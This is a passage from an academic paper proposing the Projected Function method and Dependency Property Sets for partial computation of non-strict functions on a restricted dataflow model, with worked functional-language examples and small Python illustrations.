In contrast to the theoretical or interpreter based approach, machine architecture that can execute partial computation directly has not yet been proposed. The authors have proposed a new dataflow computation model named Generation Bridging Operator (GBO) model, and have provided detailed discussions on one category of the GBO model named the Dynamic-Coloring Static-Bridging (DCSB) model [6]. Although the DCSB model has a parallel partial computation capability, this model is limited only to the partial computation of strict functions [6].
This paper presents a new partial computation method named the Projected Function method. The method makes it possible to execute general partial computation only with the restricted computational power of the DCSB model.
The most important concept in this method is the notion of the Dependency Property Set (DPS). The DPS indicates the dependency relation between parameters of functions and result values. An algorithm to compute DPSs based on the data flow analysis method [7] is also presented.
2. Dependency Property Set
2.1 Functional Programming Language
This sub-section introduces the functional programming language used in this paper. This language is similar to Valid [8], and is the same as the language used by Ono et al.[6].
The factorial function can be defined as follows:
\[
\text{fact} = {}^{\wedge}[n]\ \text{if } n=0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1)\ \text{fi}
\]
The above expression is an example of a function definition. The identifier "fact" is a function name, and "n" is a formal parameter. The right-hand side of the equation (i.e. "^[n] if ... fi") is referred to as a function, and "if ... fi" is the function body. If more than one formal parameter exists, they should be separated by commas and enclosed in square brackets, such as "^[p1,p2,...,pn]".
Computation is the combination of function applications and simplifications. A function application replaces the function name with its body, and substitutes actual parameters for formal parameters. Some functions are primitive and defined as axioms. Replacing a primitive function application with its resultant value, is called a simplification. In the following, infix operators such as "+", "*", "==" as well as "if-then-else-fi" are assumed to be primitive.
For example, the computation of \(\text{fact}(3)\) is shown below.
\[
\begin{align*}
\text{fact}(3) &= ({}^{\wedge}[n]\ \text{if } n=0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1)\ \text{fi})(3) \\
&= \text{if } 3=0 \text{ then } 1 \text{ else } 3 \times \text{fact}(3-1)\ \text{fi} \\
&= 3 \times \text{fact}(2) \\
&= 3 \times (2 \times \text{fact}(1)) \\
&= 3 \times (2 \times (1 \times 1)) \\
&= 6
\end{align*}
\]
A value definition equates its left-side identifier (or a value name) to its right-side expression. A block expression is a sequence of expressions enclosed by "{" and "}". The value of the block expression is determined by a return expression in the block expression. The order of the expressions in a block expression has no meaning. Therefore, in the following example, all expressions have the same meaning:
\[
\begin{align}
&\{\ \texttt{y=x-1; z=y**2 + 2*y + 3; return z}\ \} \tag{2.1} \\
&\{\ \texttt{z=(x-1)**2 + 2*(x-1) + 3; return z}\ \} \tag{2.2} \\
&\{\ \texttt{z=y**2 + 2*y + 3; y=x-1; return z}\ \} \tag{2.3}
\end{align}
\]
where the expression (2.2) can be obtained by substituting "y" in the expression (2.1) with "x-1", and the expression (2.3) can be obtained by transposing the first and second value definitions in the expression (2.1).
Function names and value names are generically called variables. Identifiers defined in the block expression are named bound variables as are the formal parameters in the function body. The scope of the value/function definitions placed in a block expression is limited to within the block expression. This language adopts the static binding rule. Namely, a free variable in a block expression is bound to the formal parameter of the lexically closest surrounding function definition or to the function/value definition of the lexically closest surrounding block expression [8].
2.2 Computation Rules
A computation rule determines the evaluation order when actual parameters of a function application themselves contain other function applications. The Parallel-Innermost Computation (PIC) rule, and the Parallel-Outermost Computation (POC) rule are especially important for parallel computation.
The PIC rule first selects all actual parameters for evaluation, and then, a function is applied to those parameters. The POC rule first applies a function to unevaluated actual parameters. These parameters are evaluated at the time their values are actually required for expression evaluation.
Hereafter, in an analogy to the case for sequential computation, the PIC rule is called call-by-value, while the POC rule is labeled call-by-name.
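The difference between the two rules can be sketched in Python (an illustrative fragment, not from the paper; `if_poc` and `undefined` are my names), modeling call-by-name parameters as thunks that are forced only on demand:

```python
def undefined():
    # models an undefined (non-terminating or erroring) computation
    raise RuntimeError("undefined")

# Call-by-name (POC): parameters arrive as thunks and are forced
# only when the function body actually needs their values.
def if_poc(cond, then_br, else_br):
    return then_br() if cond() else else_br()

# The untaken branch is never forced, so this call terminates:
result = if_poc(lambda: 3 > 0, lambda: 3, undefined)
assert result == 3

# Call-by-value (PIC) would evaluate all three parameters before
# applying the function, so the same call would fail before the
# body even runs.
```

This is exactly why non-strict functions such as "if-then-else-fi" are well-behaved under the POC rule but not under the PIC rule.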
2.3 Definition of Dependency Property Set
Sections 2.3 and 2.4 provide the definitions of the DPS and related concepts required in the following discussions. In this paper, primitive functions are always assumed to be monotonic [9], and call-by-name is assumed unless explicitly specified otherwise.
(1) Requisite parameter
Given a function "f" which takes parameters "x1", "x2", ..., "xn", a parameter "x1" is said to be a requisite parameter of "f", if and only if both of the following conditions are satisfied:
(a) The function "f" is not a totally undefined function. Namely, "f" returns a defined value for some "x1", "x2", ..., "xn".
(b) If "x1" is undefined, "f" is always undefined for any "x2", ..., "xn".
(2) Strict function
A function "f" is said to be strict if and only if all of its parameters are requisite parameters.
For example, primitive arithmetic functions such as "+" (addition), "-" (subtraction), "==" (equality) etc. are strict functions, whereas an "if-then-else-fi" function and a parallel-or (which returns "true" when one of the parameters is "true", even if some parameters are undefined) are non-strict functions.
(3) Sufficient parameter set
Given a function "f" which takes parameters "x1", "x2", ..., "xn". A parameter set \{ x1, ..., xm \} (m ≤ n) of "f" is said to be
sufficient if and only if the function "f" returns a defined value
for some "x1", ..., "xm", even if the rest of parameters "xm+1" ..., "xn" are undefined.
As can be easily shown, the union of sufficient parameter sets
is also a sufficient parameter set, and the requisite parameter of
"f" is always included in any sufficient parameter set of "f".
(4) Minimally sufficient parameter set
Given a function "f" which takes parameters "x1", "x2", ..., "xn", a sufficient parameter set S = \{x1, ..., xm\} (m ≤ n) is said to be minimal if and only if there exist values of "x1", ..., "xm" for which the function "f" returns a defined value, but "f" always becomes undefined when one or more of the parameters in "S" become undefined.
(5) Dependency property set (basic idea)
A dependency property set (DPS) of a function "f" is a set
which contains all minimally sufficient parameter sets of "f" as
elements. (This definition is extended in the next sub-section.)
For example, suppose that
\[
\text{add3} = {}^{\wedge}[x,y,z]\ x+y+z .
\]
Then, all parameters are requisite parameters and the sufficient parameter set is uniquely determined as \{x,y,z\}. Thus, the DPS of this function is \( \{ \{x,y,z\} \} \). In general, the DPS of a strict function consists of only one element: the set of all of its parameters. The DPS of constant functions is \( \{ \{ \} \} \), and the DPS of totally undefined functions is \( \{ \} \).
Consider the non-strict function
\[
\text{if\_func} = {}^{\wedge}[x,y,z]\ \text{if } x \text{ then } y \text{ else } z\ \text{fi}.
\]
In this case, only "x" is a requisite parameter. In addition, \( \{x,y\}, \{x,z\}, \{x,y,z\} \) are sufficient parameter sets, whereas \( \{x,y\}, \{x,z\} \) are minimal. Therefore, the DPS of "if\_func" is \( \{ \{x,y\}, \{x,z\} \} \).
The intersection of all elements in the DPS of "f" is a set of requisite parameters of "f". In addition, if a formal parameter "x" of "f" is not contained in the union of all elements in the DPS of "f", the parameter does not affect the result of "f".
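These two facts about a DPS can be stated as executable code. The following Python fragment is an illustrative sketch (not from the paper; the function names are mine), representing a DPS as a collection of parameter sets:

```python
def requisite_params(dps):
    # intersection of all minimally sufficient parameter sets:
    # the parameters the function always needs
    return set.intersection(*(set(e) for e in dps)) if dps else set()

def used_params(dps):
    # union of all minimally sufficient parameter sets:
    # the parameters that can affect the result at all
    return set().union(*dps)

dps_if_func = [{"x", "y"}, {"x", "z"}]    # DPS of if_func above
assert requisite_params(dps_if_func) == {"x"}   # only x is requisite
assert used_params(dps_if_func) == {"x", "y", "z"}
```

Applied to the DPS \( \{ \{x\}, \{x,y\} \} \) below, `requisite_params` yields \{x\} and `used_params` yields \{x,y\}, so a parameter absent from the union (like "z") is provably unused.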
For example, suppose
\[
f = {}^{\wedge}[x,y,z]\ \text{if } x>0 \text{ then } x \text{ else } f(x+y,y,x+z)\ \text{fi}
\]
The DPS of "f" is \( \{ \{x\}, \{x,y\} \} \). The algorithm to compute the DPS will be discussed in Section 4). The intersection of all elements in the DPS is \( \{x\} \), and the union is \( \{x,y\} \). Therefore, "x" is a requisite parameter of "f" whereas "z" is never used in "f".
2.4 The DPSs in Functional Programming
(1) Dependency property set (general)
In the functional programming language described in Section 2.1, the concept of the DPS should be generalized.
[Example 2-1]
\[
\begin{align*}
\{\ f &= {}^{\wedge}[x,y]\ \text{if } x>0 \text{ then } f(x-1,y+1) \text{ else } g(x,y)\ \text{fi}; \\
g &= {}^{\wedge}[x,y]\ \text{if } x=0 \text{ then } y \text{ else } f(-x,-y)\ \text{fi}\ \}
\end{align*}
\]
The DPS of "f" depends upon the DPS of "g" as well as the DPS of "f" itself. Following notation is used to describe the DPS of "g(x,y)":
Dependency Property Set
\[(g \{x\} \{y\})\]
where "g" is a function name, and \{x\}, \{y\} are DPSs corresponding to the DPSs of the first and second parameters for "g", respectively. Therefore, the DPS of "f" can be written as:
\[\{x,(f \{x\} \{y\})\}, \{x,(g \{x\} \{y\})\}\]
The DPS can also be defined for expressions.
[Example 2-2]
\[\text{exp} = \{ x = p + q; \ y = x * x; \ \text{return} \ y \}\]
Then, the DPS of "x" is \{p,q\}. The DPS of a block expression is the DPS of its return value. Therefore, the DPS of "exp" is equal to the DPS of "y", and is equal to \{p,q\}.
Formally, the syntax of DPSs can be described as follows:
[Definition 2-1] The syntax of DPSs
\[
\begin{align*}
\text{DPS} & = \{ \text{MSPS-seq} \} \\
\text{MSPS-seq} & = \text{MSPS} | \text{MSPS}, \text{MSPS-seq} \\
\text{MSPS} & = \{ \text{P-seq} \} \\
\text{P-seq} & = \text{P} | \text{P}, \text{P-seq} \\
\text{P} & = \text{value-name} | \text{function-application-form} \\
\text{function-application-form} & = (\text{function-name} \ \text{parameter-DPS-list}) \\
\text{parameter-DPS-list} & = \text{DPS} | \text{DPS} \ \text{parameter-DPS-list} \\
\text{value-name} & = \text{variable} \\
\text{function-name} & = \text{variable} \\
\text{variable} & = \text{IDENTIFIER}
\end{align*}
\]
where the statement "a = x" means that "a" is defined as "x", and the statement "a = x \mid y" means that "a" is defined as "x" or "y".
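As a hedged illustration (not part of the paper), the grammar above can be mirrored directly by a small Python representation: an MSPS as a frozenset of value names and application forms, a DPS as a frozenset of MSPSs, and a function-application-form as a small frozen record.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class App:
    """A function-application-form: (function-name parameter-DPS-list)."""
    fn: str
    arg_dpss: tuple  # one DPS per formal parameter

# DPS = frozenset of MSPSs; MSPS = frozenset of value names / App forms
x_dps = frozenset({frozenset({"x"})})
y_dps = frozenset({frozenset({"y"})})

# The DPS of "f" from Example 2-1:
#   { {x, (f {{x}} {{y}})}, {x, (g {{x}} {{y}})} }
dps_f = frozenset({
    frozenset({"x", App("f", (x_dps, y_dps))}),
    frozenset({"x", App("g", (x_dps, y_dps))}),
})
assert len(dps_f) == 2
```

Using frozen (hashable) containers lets DPSs nest inside MSPSs exactly as the grammar nests parameter-DPS-lists inside application forms.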
(2) Tagged DPS (TDPS)
The DPS is an attribute of functions and values. To explicitly declare such relations, tagged DPSs are used.
[Definition 2-2] The syntax of TDPSs
\[
\begin{align*}
\text{TDPS} & = (\text{function-name} \ (\text{formal-parameter-list}) \ \text{DPS}) \\
& \ \ \mid \ (\text{value-name} \ \text{EMPTY} \ \text{DPS}) \\
\text{formal-parameter-list} & = \text{formal-parameter} | \\
& \ \ \ \text{formal-parameter formal-parameter-list} \\
\text{formal-parameter} & = \text{variable}
\end{align*}
\]
For example, the DPS of "f" in Example 2-1 is described using a TDPS as follows:
\[ (f\ (x\ y)\ \{\ \{x, (f\ \{\{x\}\}\ \{\{y\}\})\},\ \{x, (g\ \{\{x\}\}\ \{\{y\}\})\}\ \}) \]
Similarly, the TDPS of "x" in Example 2-2 is
\[ (x\ \text{EMPTY}\ \{\ \{p,q\}\ \}) \]
The leftmost field of a TDPS is called the name of the TDPS.
(3) Dependency environment
To analyze the dependency of variables, it is desirable to gather all the TDPSs visible in a given scope. For this purpose, a set of TDPSs named a dependency environment (DE) is introduced.
[Definition 2-3] The syntax of dependency environments is
\[ \text{DE} = \{ \ \text{TDPS-seq} \} \]
\[ \text{TDPS-seq} = \text{TDPS} \ | \ \text{TDPS}, \ \text{TDPS-seq} \]
For example, the DE of a block in Example 2-1 is
\[
\begin{gathered}
\{\ (f\ (x\ y)\ \{\ \{x, (f\ \{\{x\}\}\ \{\{y\}\})\},\ \{x, (g\ \{\{x\}\}\ \{\{y\}\})\}\ \}), \\
(g\ (x\ y)\ \{\ \{x,y\},\ \{x, (f\ \{\{x\}\}\ \{\{y\}\})\}\ \})\ \}
\end{gathered} \tag{2.4}
\]
Similarly, the DE of a block in Example 2-2 is
\[
\{\ (x\ \text{EMPTY}\ \{\ \{p,q\}\ \}),\ (y\ \text{EMPTY}\ \{\ \{x\}\ \})\ \} \tag{2.5}
\]
(4) Normal form of DPSs
The concept of free variables is extended to DEs. A variable "n" of a TDPS "d" is said to be free in the DE "E" if and only if
(a) "n" does not appear in any name of the TDPSs in "E", and
(b) if "d" is a TDPS of a function, "n" does not appear in the formal parameter list of "d".
For example, "p" and "q" in the DE (2.5) shown above are free, whereas "x" is not free.
A TDPS "d" is said to be in a normal form in a DE "E", if and only if
dependency Property Set
(a) if "d" is a TDPS of a function, the DPS of "d" contains only
formal parameters of "d" and free variables in "E".
(b) if "d" is a TDPS of a value, the DPS of "d" contains only
free variables in "E".
A DPS is said to be in the normal form in a DE "E", if and only
if its TDPS is in the normal form in "E". A DE is said to be in the
normal form, if and only if it consists of only normal-form TDPSs.
The normal forms of DEs (2.4) and (2.5) are shown below.
[Normal form of DE (2.4)]
\[
\{\ (f\ (x\ y)\ \{\ \{x,y\}\ \}),\ (g\ (x\ y)\ \{\ \{x,y\}\ \})\ \}
\]
[Normal form of DE (2.5)]
\[
\{\ (x\ \text{EMPTY}\ \{\ \{p,q\}\ \}),\ (y\ \text{EMPTY}\ \{\ \{p,q\}\ \})\ \}
\]
The algorithm for normalizing DPSs is described in Section 4.
3. Projected Function Method
3.1 General Partial Computation
The computation described in Section 2.1 requires that all
actual parameters be known (or bound) even though it permits some
actual parameters to remain unevaluated. Thus, it is called total
computation [1]. In contrast, partial computation can proceed even
though some parameters remain unknown *). Such unknown parameters
can be bound after or during the partial computation.
A partial computation algorithm for functional programming
languages (recursive program schemata) has been discussed by Ershov
[3]. The term tabulation in his paper covers both the operations specific to partial computation and a general optimization technique known as tabulation [10]. In addition, when Ershov's approach is used, it becomes rather complicated to discuss the limitations of a dataflow machine's computational power. Therefore, to avoid ambiguity and to clarify the present discussion, the authors present their own view of partial computation concepts in functional programming.
Partial computation consists of partial applications, pre-binding applications and partial simplifications.
(1) Partial application
Partial application stands for the application of a function to known parameters and the computation of a function that takes the value of the rest of the parameters (i.e. unknown parameters). This can be achieved by currying [11] known parameters from the function, and then applying these parameters.
For example, suppose that
\[ f = {}^{\wedge}[x,y]\ (x+1)*x + y \]
If "x" is known to be 2, then a partial application is possible. The result is as follows:
\[
\begin{align*}
\text{fx} &= {}^{\wedge}[x]\ {}^{\wedge}[y]\ (x+1)*x + y \\
\text{f2} &= \text{fx}(2) \\
&= ({}^{\wedge}[x]\ {}^{\wedge}[y]\ (x+1)*x + y)(2) \\
&= {}^{\wedge}[y]\ (2+1)*2 + y
\end{align*}
\]
*) Take care to distinguish between "unknown" and "undefined" variables. Unknown variables can be made known at any time by binding values to these variables. On the contrary, undefined is a special state of the known variables. Therefore, the undefined variables remain undefined throughout the entire computation.
\[
= {}^{\wedge}[y]\ 6 + y
\]
The function "fx" is obtained by currying the known parameter "x" from "f". Then, the actual parameter value 2 is applied to "fx", and the result \({}^{\wedge}[y]\ 6 + y\) is computed.
(2) Pre-binding application
The result of partial applications is a function that takes only unknown parameters. Pre-binding applications are essentially the same as function applications. The difference is that all actual parameters are unknown in pre-binding applications.
For example, suppose that "f2" is the function defined above, and "u" is an unknown variable. Then,
\[
\text{f2}(u) = ({}^{\wedge}[y]\ 6 + y)(u) = 6 + u
\]
(3) Partial simplification
Partial simplification is the simplification of expressions containing unknown variables. Partial simplification has significance for non-strict primitive functions. As an example, suppose
\[
\text{expr} = (\text{if } x > 0 \ \text{then } x \ \text{else } y \ \text{fi}) + x
\]
and x is known to be 2. Then,
\[
\text{expr} = (\text{if } 2 > 0 \ \text{then } 2 \ \text{else } y \ \text{fi}) + 2 = (\text{if } \text{true} \ \text{then } 2 \ \text{else } y \ \text{fi}) + 2
\]
In this case, the non-strict function if-then-else-fi can be partially simplified. The result is
\[
\text{expr} = 2 + 2 = 4
\]
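A minimal sketch of partial simplification in Python (illustrative only; `UNKNOWN` and `simplify_if` are my names, not the paper's): the non-strict conditional can discard the untaken branch as soon as its condition becomes known, even while the other branch is still unknown.

```python
UNKNOWN = object()   # marker for an unknown (not yet bound) value

def simplify_if(cond, then_v, else_v):
    # Partial simplification of "if-then-else-fi": once the condition
    # is known, the untaken branch is dropped even if it is unknown.
    if cond is UNKNOWN:
        return ("if", cond, then_v, else_v)   # residual expression
    return then_v if cond else else_v

x, y = 2, UNKNOWN
expr = simplify_if(x > 0, x, y) + x   # (if 2>0 then 2 else y fi) + 2
assert expr == 4
```

A strict primitive could not do this: it would have to force "y" first, and the whole expression would remain blocked on the unknown value.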
3.2 Tabulation Technique in Partial Computation
Tabulation (in the context of total computation) is a well-known technique for improving computational efficiency [10]. Tabulation means keeping track of function applications, and storing each return value together with the function name and its actual parameters. When the same function application is encountered again, the return value can be obtained immediately from the table instead of recomputing the function application.
The approach presented in this paper adopts a currying operation, and generates functions that take only known parameters. Therefore, tabulation techniques for total computation [10,12] can be easily applied by storing the results of partial applications in tables or lists.
For example, suppose
\[
\begin{align*}
\text{ack} = {}^{\wedge}[x,y]\ &\text{if } x=0 \text{ then } y+1 \\
&\text{else if } y=0 \text{ then } \text{ack}(x-1,1) \\
&\text{else } \text{ack}(x-1,\text{ack}(x,y-1))\ \text{fi fi}
\end{align*}
\]
Then, "ack(0,y)" named "inc" can be computed as follows:
\[
\begin{align*}
\text{ackx} = {}^{\wedge}[x]\ {}^{\wedge}[y]\ &\text{if } x=0 \text{ then } y+1 \\
&\text{else if } y=0 \text{ then } \text{ack}(x-1,1) \\
&\text{else } \text{ack}(x-1,\text{ack}(x,y-1))\ \text{fi fi}
\end{align*}
\]
\[
\text{inc} = \text{ackx}(0) = {}^{\wedge}[y]\ y+1
\]
Similarly, "ack(1,y)" named "add" can be computed as follows:
\[
\begin{align*}
\text{add} &= \text{ackx}(1) \\
&= {}^{\wedge}[y]\ \text{if } y=0 \text{ then } \text{ack}(0,1) \text{ else } \text{ack}(0,\text{ack}(1,y-1))\ \text{fi} \\
&= {}^{\wedge}[y]\ \text{if } y=0 \text{ then } \text{ackx}(0)(1) \text{ else } \text{ackx}(0)(\text{ackx}(1)(y-1))\ \text{fi} \\
&= {}^{\wedge}[y]\ \text{if } y=0 \text{ then } \text{inc}(1) \text{ else } \text{inc}(\text{add}(y-1))\ \text{fi}
\end{align*}
\]
In the above example, the results of "ackx(0)" and "ackx(1)" are stored in the table (which may be constructed using hashing), and the computation of these results can be shared among other computations of the "ack" function.
General partial computation in functional programming is achieved by the method described in Section 3.1 in accordance with such tabulation techniques for total computation.
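The tabulation of partial applications described above can be sketched in Python (an illustrative fragment, not the paper's implementation; `functools.lru_cache` plays the role of the table, and `ackx` is the curried function from the example):

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def ackx(x):
    # Table of partial applications: each projected function ackx(0),
    # ackx(1), ... is computed once and the same closure is shared
    # by every later lookup with the same known parameter.
    if x == 0:
        return lambda y: y + 1            # "inc" in the text
    def f(y):
        if y == 0:
            return ackx(x - 1)(1)
        return ackx(x - 1)(ackx(x)(y - 1))
    return f

inc = ackx(0)
add = ackx(1)                 # behaves as ack(1, y) == y + 2
assert inc(5) == 6 and add(3) == 5
assert ackx(0) is inc         # the table returns the shared function
```

The identity check at the end is the point of the technique: `ackx(1)` inside the body of `add` is a table lookup, not a recomputation of the partial application.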
3.3 Projection of Functions
(1) Projection of a function
A projection of a function "f" by a parameter set "u" is a partial computation of "f", specifying "u" as unknown parameters and the rest of parameters as undefined.
For example, suppose that a function "f" is defined as
\[ f = {}^{\wedge}[x,y,z]\ e(x,y,z) \]
where "e(x,y,z)" is an arbitrary expression of "x", "y" and "z". Then, a projection of "f" by \{x\} named "fx" is defined as
\[ \text{fx} = ({}^{\wedge}[y,z]\ {}^{\wedge}[x]\ e(x,y,z))(w,w) \]
where "w" (please read it "omega" in this paper) stands for an undefined value.
Similarly, a projection of "f" by a parameter set \{x,y\} named "fxy" is defined as
\[ \text{fxy} = ({}^{\wedge}[z]\ {}^{\wedge}[x,y]\ e(x,y,z))(w) \]
If function applications with undefined parameters appear in the body, these functions must also be projected by the parameter set excluding these undefined parameters. For example, suppose
\[ f = \hat{[x,y]} \text{if } x > 0 \text{ then } x \text{ else } f(x+y,y) \text{ fi} \quad (3.1) \]
Then, a projection of "f" by \{x\} named "fx" is
\[ fx = [\hat{[y]}\ \hat{[x]}\ \text{if } x > 0 \text{ then } x \text{ else } f(x+y,y) \text{ fi}](w) \]
\[ = \hat{[x]}\ \text{if } x > 0 \text{ then } x \text{ else } f(x+w,w) \text{ fi} \]
Since the primitive function "+" is strict, the function obtained by projecting "+" by the first parameter is a totally undefined function. Thus,
\[ fx = \hat{[x]}\ \text{if } x>0 \text{ then } x \text{ else } f(w,w) \text{ fi} \]
Then, a projection of "f" by {} named "fw" should be computed.
\[ fw = [\hat{[x,y]}\ \hat{[]}\ \text{if } x>0 \text{ then } x \text{ else } f(x+y,y) \text{ fi}](w,w) \]
\[ = \hat{[]}\ \text{if } w>0 \text{ then } w \text{ else } f(w+w,w) \text{ fi} \]
\[ = \hat{[]}\ W() \]
where "W" stands for a totally undefined function. Therefore,
\[ fx = \hat{[x]}\ \text{if } x>0 \text{ then } x \text{ else } w \text{ fi} \quad (3.2) \]
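Expression (3.2) can be modeled in Python with an explicit sentinel for the undefined value "w"; the encoding is ours, chosen only to make the collapsed recursive branch visible:

```python
W = object()  # the undefined value "w" ("omega")

def fx(x):
    # Projection of f = ^[[x,y] if x>0 then x else f(x+y,y) fi] by {x}.
    # Since "+" is strict, x + w is undefined, so the recursive branch
    # collapses to w, giving Expression (3.2).
    return x if x > 0 else W
```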
(2) Projection of a DPS
Given a function "f" which has the DPS "s", assume that a function "fa" is obtained by projecting "f" by a parameter set "a". Then, the DPS of "fa" named "sa" can be computed from "s" and "a" as follows:
(a) If the DPS "s" is the null set, then, so is "sa".
(b) For the case where "s" has elements "ei" (i=1,..,n) (n>0), "sa" is the set of those "ei" (i=1,..,n) which satisfy the condition ei ⊆ a.
Since "sa" can be computed using only "s" and "a", "sa" is called a projection of "s" by "a".
For example, suppose "f" is the function defined in Expression (3.1). Then, the DPS of "f", named "s", is \{ \{x\}, \{x,y\} \}. The projection of "s" by \{x\} is \{ \{x\} \}. This matches the DPS of "fx" defined in Expression (3.2). Similarly, the projection of "s" by \{y\} is the null set, indicating that the projection of "f" by \{y\} (named "fy") is a totally undefined function. This can be confirmed as follows:
\[ fy = [\hat{[x]}\ \hat{[y]}\ \text{if } x>0 \text{ then } x \text{ else } f(x+y,y) \text{ fi}](w) \]
\[ = \hat{[y]}\ \text{if } w > 0 \text{ then } w \text{ else } f(w+y,y) \text{ fi} \]
\[ = \hat{[y]}\ W() \]
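The projection of a DPS described above amounts to a subset filter. A small Python sketch (the set-of-frozensets encoding is ours):

```python
def project_dps(dps, a):
    # Rule (b): keep exactly the MSPSs that are subsets of the known
    # parameter set "a"; rule (a) (the null DPS) falls out for free.
    a = frozenset(a)
    return {msps for msps in dps if msps <= a}

# The DPS of the function in Expression (3.1):
s = {frozenset({'x'}), frozenset({'x', 'y'})}
```

Projecting `s` by `{'y'}` yields the empty set, mirroring the totally undefined "fy" above.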
3.4 Restricted Class of Partial Computation
There exists a computation model which has a restricted partial computational power. For example, the DCSB model has the following limitations:
1. Its computation is based on call-by-value.
2. It cannot perform pre-binding applications.
3. It has only restricted power on partial simplifications.
Limitation (1) can be overcome by introducing a lazy-evaluation mechanism [2] into the dataflow model [13]. Limitations (2) and (3), however, are more substantial, and are difficult to overcome. The origin of these limitations is in the dataflow model itself. In the dataflow model, computation is controlled by tokens that carry data. Normally, such data are the resultant values of previous computation. In a lazy-evaluation context, data are either evaluated values or recipes that are to be evaluated [2]. In any event, tokens must reach a node to initiate computation in that node. Nevertheless, unknown values correspond to the state where a token has not yet reached a node. Therefore, computation is not possible for unknown values.
The limitations (2) and (3) become a serious problem when functions to be computed are non-strict. For example, suppose
\[ f = \hat{[x,y]}\ \text{if } x > 0 \text{ then } x \text{ else } y \text{ fi} \]
\[ e = f(x,u) + x \]
and "x" is known to be 2. Then,
\[ e = f(2,u) + 2 \]
\[ = [\hat{[x]}\ \hat{[y]}\ \text{if } x > 0 \text{ then } x \text{ else } y \text{ fi}](2)(u) + 2 \]
\[ = [\hat{[y]}\ \text{if } 2 > 0 \text{ then } 2 \text{ else } y \text{ fi}](u) + 2 \]
If general partial simplification is possible, the above expression can be simplified as follows:
\[ e = [\hat{[y]}\ 2](u) + 2 \]
However, such simplification cannot be executed with the DCSB Model [6].
If pre-binding applications are allowed, the expression "e" can be further reduced as follows:
\[ e = 2 + 2 \]
\[ = 4 \]
As shown above, the limitations of the DCSB model significantly confine the partial computation process of programs.
In total computation, call-by-value is widely used, even though it has only a restricted power in contrast to call-by-name. This is because call-by-value exhibits superior execution speed and ease of implementation. Since pre-binding applications are more general in concept than call-by-name applications, it seems reasonable to consider the sub-class of partial computation which excludes pre-binding applications. The following sub-section will present a discussion of the partial computation method under this constraint.
3.5 Projected Function Method for Restricted Partial Computation
Given a function "f" which has the DPS "s", consider the case where "f" is partially computed by the parameter set "a". The projected function method is then defined as the following computation process:
(1) Compute the projection of "s" by "a", and name it "sa".
(2) If "sa" is null, then go to Step (5).
(3) Compute a projection of "f" by "a", and name it "fa".
(4) Totally apply actual values of "a" to "fa". If a defined value is returned, the value is the result of the partial computation. If an undefined value is explicitly returned, then go to Step (5).
(5) If "a" contains at least one requisite parameter of "f", then go to Step (6). Otherwise, terminate partial computation of this function application.
(6) Partially apply actual values of "a" to "f".
(7) If the result of Step (6) contains function applications with unknown parameters, partially apply these functions using this method.
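The steps above can be sketched as a small Python driver. The dict encoding of known parameters, the `UNDEFINED` sentinel, and the residual/unchanged result tags are our own illustrative choices, not the paper's notation:

```python
UNDEFINED = object()  # models the undefined value "w"

def f(env):
    # f = ^[[x,y] if x > 0 then x else y fi], read over a dict of known
    # parameters; a missing parameter reads as UNDEFINED.
    x = env.get('x', UNDEFINED)
    if x is UNDEFINED:
        return UNDEFINED
    return x if x > 0 else env.get('y', UNDEFINED)

def partially_compute(func, dps, known, requisite):
    # Steps (1)-(6) of the method, in our encoding.
    a = frozenset(known)
    sa = {m for m in dps if m <= a}        # (1) project the DPS by "a"
    if sa:                                 # (2) projection is non-null
        value = func(known)                # (3)+(4) totally apply "fa"
        if value is not UNDEFINED:
            return value
    if a & requisite:                      # (5) any requisite parameter?
        return ('residual', known)         # (6) leave a partial application
    return ('unchanged', None)

dps_f = {frozenset({'x'}), frozenset({'x', 'y'})}
```

With `x` known to be 2 the driver returns the value 4 would be built from; with `x` negative it falls through to the residual case, as in the example that follows.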
For example, consider the example discussed in Section 3.4.
\[
\begin{align*}
f &= \hat{[x,y]}\ \text{if } x > 0 \text{ then } x \text{ else } y \text{ fi}; \\
e &= f(x, u) + x
\end{align*}
\]
where "x" is known to be 2.
The DPS of "f" is \{ {x}, {x, y} \}, and the projection by \{x\} is \{ {x} \}. Since it is not null, the expression is computed as follows:
Step (1): A projection of "f" by \{x\}, named "fx", is computed.
\[
\begin{align*}
fx &= [\hat{[y]}\ \hat{[x]}\ \text{if } x > 0 \text{ then } x \text{ else } y \text{ fi}](w) \\
&= \hat{[x]}\ \text{if } x > 0 \text{ then } x \text{ else } w \text{ fi}
\end{align*}
\]
Step (2): "fx" is totally applied to a known parameter.
\[
\begin{align*}
e &= fx(2) + 2 \\
&= [\hat{[x]}\ \text{if } x > 0 \text{ then } x \text{ else } w \text{ fi}](2) + 2 \\
&= (\text{if } 2 > 0 \text{ then } 2 \text{ else } w \text{ fi}) + 2 \\
&= 2 + 2 \\
&= 4
\end{align*}
\]
As shown above, the projected function method makes it possible to execute partial computation without pre-binding applications, at the sacrifice of computational complexity. This method can also be applied to non-strict primitives such as "if-then-else-fi".
The key idea of this method is the concept of the DPS. The next section is devoted to discussing DPSs.
4. Data Flow Analysis for DPSs
4.1 Overview of Data Flow Analysis for DPSs
Figure 4-1 shows the outline of our approach to data flow analysis for obtaining DPSs. The goal of the data flow analysis is to obtain a normal form of DPSs for all functions, which consists of the following two sub-goals. The first is to transform each function into an initial DPS which is obtained through the data flow analysis only in the function body. The second is to obtain the normal form of DPSs by reducing the results of the first sub-goal with the DE where function definitions are placed. The second sub-goal is achieved through a stepwise reduction of DPSs, called the DPS normalization procedure.
In the DPS normalization procedure, three data structures, namely, DPS$, TDPS$ and DE$ are introduced corresponding to DPS, TDPS and DE defined in Section 2.4, respectively. DPS$, which is called a flat form of DPS, is the same as DPS except that all function application forms in DPS are replaced with the symbol "$". After the introduction of DPS$, it is easy to develop TDPS$ and DE$ from the definitions of TDPS and DE, i.e. TDPS$ and DE$ are the same as TDPS and DE, respectively, except that DPS in TDPS is replaced with DPS$, and TDPS in DE is replaced with TDPS$. Using the above three data structures, the DPS normalization procedure can be described as follows.
First, the normal form of each DPS is assumed to be DPS$, and the normal form of DE is also assumed to be DE$. Next, all DPS$ in DE$ are modified with an operation called DPS reduction which replaces each parameter in DPS with DPS$ if TDPS$ of the parameter is in DE$. The DPS reductions for all DPS$ provide new DPS$ and DE$
